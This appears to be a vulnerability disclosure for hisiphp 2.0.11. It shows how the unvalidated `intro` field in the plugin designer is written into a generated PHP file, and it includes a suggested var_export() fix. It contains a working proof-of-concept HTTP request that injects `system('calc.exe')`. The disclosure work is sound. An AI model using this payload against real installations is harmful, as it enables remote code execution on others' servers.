A code injection vulnerability in hisiphp 2.0.11
In https://github.com/hisiphp/hisiphp/blob/d05c908c29d574b84aa9e8932b13a5ef54e0a429/application/system/admin/Plugins.php#L129, `$data` is read straight from the POST body and is therefore fully user-controlled.
```php
// application/system/admin/Plugins.php, design action (excerpt)
$model = new PluginsModel();
$data = $this->request->post();                 // every POST field, user controlled
$result = $this->validate($data, 'app\system\validate\SystemPlugins');
if ($result !== true) {
    return $this->error($result);
}
if (!$model->design($data)) {                   // $data is passed on to the code generator
    return $this->error($model->getError());
}
```
The validator https://github.com/hisiphp/hisiphp/blob/thinkphp5.1/v2/application/system/validate/SystemPlugins.php is applied to `$data` here, but it only constrains some of the fields; `intro`, among others, has no rule at all.
```php
<?php
// application/system/validate/SystemPlugins.php
namespace app\system\validate;

use think\Validate;

class SystemPlugins extends Validate
{
    // Validation rules (only these fields are checked; `intro` is not listed)
    protected $rule = [
        'name|插件名称'       => 'require|alpha|unique:system_plugins',
        'title|插件标题'      => 'require|chsAlphaNum|unique:system_plugins',
        'identifier|插件标识' => 'require|regex:/^[A-Za-z0-9\-\.\_]+$/',
        'author|开发者'       => 'requireWith:author|chsAlphaNum',
        'url|开发者网址'      => 'requireWith:url|url',
        'version|版本号'      => 'require|regex:/^[0-9][.][0-9][.][0-9]+$/',
    ];
}
```
In https://github.com/hisiphp/hisiphp/blob/d05c908c29d574b84aa9e8932b13a5ef54e0a429/application/system/model/SystemPlugins.php#L455, `$data['intro']` is interpolated into PHP source code with no escaping or validation.
```php
// application/system/model/SystemPlugins.php, design() (excerpt).
// The heredoc is written out verbatim as the new plugin's info.php; the $data
// fields are spliced into PHP source as raw text, so a single quote in any
// unvalidated field ends the string literal and the rest is executed as code.
$code = <<<INFO
<?php
/**
 * Plugin basic information
 */
return [
    // Core framework [required]
    'framework' => 'thinkphp5.1',
    // Plugin name [required]
    'name' => '{$data['name']}',
    // Plugin title [required]
    'title' => '{$data['title']}',
    // Unique module identifier [required], format: pluginname.[app market ID].plugins.[app market branch ID]
    'identifier' => '{$data['identifier']}',
    // Plugin icon [required]
    'icon' => '/static/plugins/{$data['name']}/{$data['name']}.png',
    // Plugin description [optional]
    'intro' => '{$data['intro']}',
    // Plugin author [required]
    'author' => '{$data['author']}',
    // Author homepage [optional]
    'author_url' => '{$data['url']}',
    // Version [required], three-part format: major.minor.patch
    // Major [1-99]: changes on a major update or very large change, e.g. the overall architecture changes.
    // Minor [0-999]: changes when module functions are added or removed; unchanged when existing functions are only supplemented.
    // Patch [0-999]: bug fixes or small changes with no major functional change; a fix for a serious bug gets a patch release.
    'version' => '{$data['version']}',
    // Original database table prefix, required when the plugin ships a SQL file
    'db_prefix' => 'db_',
    // Format: ['sort' => '100','title' => 'config title','name' => 'config name','type' => 'config type','options' => 'config options','value' => 'config default value', 'tips' => 'config hint']; for each parameter see admin panel -> System -> System functions -> Config management -> Add
    'config' => {$config},
];
INFO;
file_put_contents($path.'info.php', $code);
// ... end of design() and of the model class
```
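The root cause is that user input is spliced into PHP source text, so a validator rule for `intro` alone would still leave every other interpolated field as a potential injection point. The following is an added example (not hisiphp's own code) of how the generator above can be rewritten so that every value is emitted through `var_export()` and can never leave its string literal; it assumes `$data`, `$config` and `$path` carry the same values the original `design()` method works with.

```php
<?php
// Added example, not hisiphp's code: builds plugins/<name>/info.php from the
// same $data fields the controller accepts, but emits each value through
// var_export() so quotes and backslashes in user input are escaped as data.
// $data, $config and $path are assumed to match the original design() method.

function buildPluginInfo(array $data, array $config): string
{
    $info = [
        'framework'  => 'thinkphp5.1',
        'name'       => (string) $data['name'],          // validated: alpha
        'title'      => (string) $data['title'],
        'identifier' => (string) $data['identifier'],
        'icon'       => '/static/plugins/' . $data['name'] . '/' . $data['name'] . '.png',
        'intro'      => (string) ($data['intro'] ?? ''), // previously unvalidated
        'author'     => (string) ($data['author'] ?? ''),
        'author_url' => (string) ($data['url'] ?? ''),
        'version'    => (string) $data['version'],
        'db_prefix'  => 'db_',
        'config'     => $config,
    ];
    // var_export() produces a parseable PHP literal; a value such as
    // '.system('calc.exe').' becomes '\'.system(\'calc.exe\').\'' and stays a string.
    return "<?php\n// Plugin basic information (generated)\nreturn "
        . var_export($info, true) . ";\n";
}

function writePluginInfo(string $path, array $data, array $config): void
{
    file_put_contents($path . 'info.php', buildPluginInfo($data, $config), LOCK_EX);
}

// Demonstration with the value from the proof of concept (constructed input):
$data = [
    'name'    => 'test', 'title' => 'test', 'identifier' => 'test',
    'intro'   => "'.system('calc.exe').'",
    'author'  => 'test', 'url' => 'http://www.test.com', 'version' => '1.0.0',
];
echo buildPluginInfo($data, []);
```

Including the generated file now returns the attacker-supplied text as an ordinary string; adding an explicit rule for `intro` to `SystemPlugins` is a useful second layer but not a substitute for escaping at the generation step.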
POC:
```http
POST /admin.php/system/plugins/design.html HTTP/1.1
Host: www.myhisiphp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: http://www.myhisiphp.com
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://www.myhisiphp.com/admin.php/system/plugins/design.html
Cookie: PHPSESSID=fljtslc00l472cll5df60ilp39; hisiadmin_language=zh-cn; hisihisi_admin_theme=default; hisihisi_iframe=1; hisi_language=zh-cn

name=test&title=test&identifier=test&intro=%27%2Esystem%28%27calc%2Eexe%27%29%2E%27&author=test&url=http%3A%2F%2Fwww.test.com&version=1.0.0&dir=admin%0D%0Ahome%0D%0Amodel%0D%0Asql%0D%0Avalidate%0D%0Aview%0D%0A
```
The generated plugins/test/info.php then contains:
```php
return [
    //......
    'intro' => ''.system('calc.exe').'',
    //......
];
```
Visiting /admin.php/system/plugins/install/id/5.html, where 5 is the plugin's id, then triggers execution of the injected code.